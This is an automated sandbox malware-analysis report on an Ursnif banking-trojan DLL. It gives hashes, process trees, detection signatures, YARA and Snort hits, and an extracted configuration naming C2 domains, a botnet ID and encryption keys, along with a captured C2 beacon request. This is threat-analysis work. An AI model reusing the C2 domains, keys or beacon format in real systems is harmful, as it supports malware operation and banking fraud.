Play interactive tour

Edit tour

Windows Analysis Report 5.dll

Overview

General Information

Sample Name:	5.dll
Analysis ID:	445164
MD5:	fceb6a51be4205d11be1491f6e263cae
SHA1:	0abb60d37fac49912172c5385ff58e049520eb53
SHA256:	c521dd937ce9b2e8bda2fa915bae5b5be0e150a8b82e3b2bfb1cdbc60a8326c4
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 2248 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 452 cmdline: rundll32.exe 'C:\Users\user\Desktop\5.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1716 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2940 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3904 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5580 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 1900 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 3220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 452	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 2248	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000003.368989675.0000000000900000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 5.dll

Virustotal: Detection: 22%

Perma Link

Machine Learning detection for sample

Show sources

Source: 5.dll

Joe Sandbox ML: detected

Source: 5.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 5.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49721 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49721 -> 40.97.116.82:80

Source: Joe Sandbox View	IP Address: 52.97.144.2 52.97.144.2
Source: Joe Sandbox View	IP Address: 40.97.116.82 40.97.116.82

Source: global traffic

HTTP traffic detected: GET /grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa3C/uHqcEARrcPcZDk3/M6E_2BTZS_2BVaLqj4/34AYxwikF/REm_2FMb1QNTSjBFb_2F/tvRFv4olV4RM6PFjWcs/Yxi4zCvrQiijB3JFDfkmao/_2Ff4LrwOirbu/dGY1O2o_/2BPYCJyNgelsd4Jc6x2/N.grow HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: ~DF3A99C7AD2702480D.TMP.24.dr, {BD6AF35E-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr	String found in binary or memory: https://outlook.office365.com/grower/GwIQZ7VTU_2B0dEDGXi3usO/98Jy_2Fhjs/9ADdwnOA_2BxxHdxk/bJ6tUkE3rK
Source: ~DFBADD8EC8FEBD51BA.TMP.24.dr, {BD6AF35C-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr	String found in binary or memory: https://outlook.office365.com/grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC1A44 NtMapViewOfSection,	0_2_6DDC1A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC1996 GetProcAddress,NtCreateSection,memset,	0_2_6DDC1996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC23A5 NtQueryVirtualMemory,	0_2_6DDC23A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A75A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_02A75A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7B1A5 NtQueryVirtualMemory,	3_2_02A7B1A5

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC2184	0_2_6DDC2184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDE17B0	0_2_6DDE17B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF05E5	0_2_6DDF05E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF0DB8	0_2_6DDF0DB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDFBE61	0_2_6DDFBE61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF4E00	0_2_6DDF4E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE009C8	0_2_6DE009C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF88B7	0_2_6DDF88B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7888E	3_2_02A7888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A73EE1	3_2_02A73EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7AF80	3_2_02A7AF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDE17B0	3_2_6DDE17B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDF05E5	3_2_6DDF05E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDF0DB8	3_2_6DDF0DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDFBE61	3_2_6DDFBE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDF4E00	3_2_6DDF4E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE009C8	3_2_6DE009C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDF88B7	3_2_6DDF88B7

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6DDF3290 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6DDF3290 appears 39 times

Source: 5.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal84.troj.winDLL@18/7@6/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02A7A65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02A7A65C

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{BD6AF35A-DF4A-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF48F8DB99852E5824.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition

Source: 5.dll

Virustotal: Detection: 22%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Sing
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Sing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 5.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress,

0_2_6DDC1BAC

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC2173 push ecx; ret	0_2_6DDC2183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDC2120 push ecx; ret	0_2_6DDC2129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDEDE07 push ecx; ret	0_2_6DDEDE1A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF32D5 push ecx; ret	0_2_6DDF32E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1C347 push eax; ret	0_2_6DE1C3B1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1C400 push eax; ret	0_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7E0C7 push cs; ret	3_2_02A7E0C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7E458 push ds; retf	3_2_02A7E47A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7ABC0 push ecx; ret	3_2_02A7ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7E163 push edx; iretd	3_2_02A7E164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02A7AF6F push ecx; ret	3_2_02A7AF7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDEDE07 push ecx; ret	3_2_6DDEDE1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDF32D5 push ecx; ret	3_2_6DDF32E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE1C400 push eax; ret	3_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE1C347 push eax; ret	3_2_6DE1C3B1

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
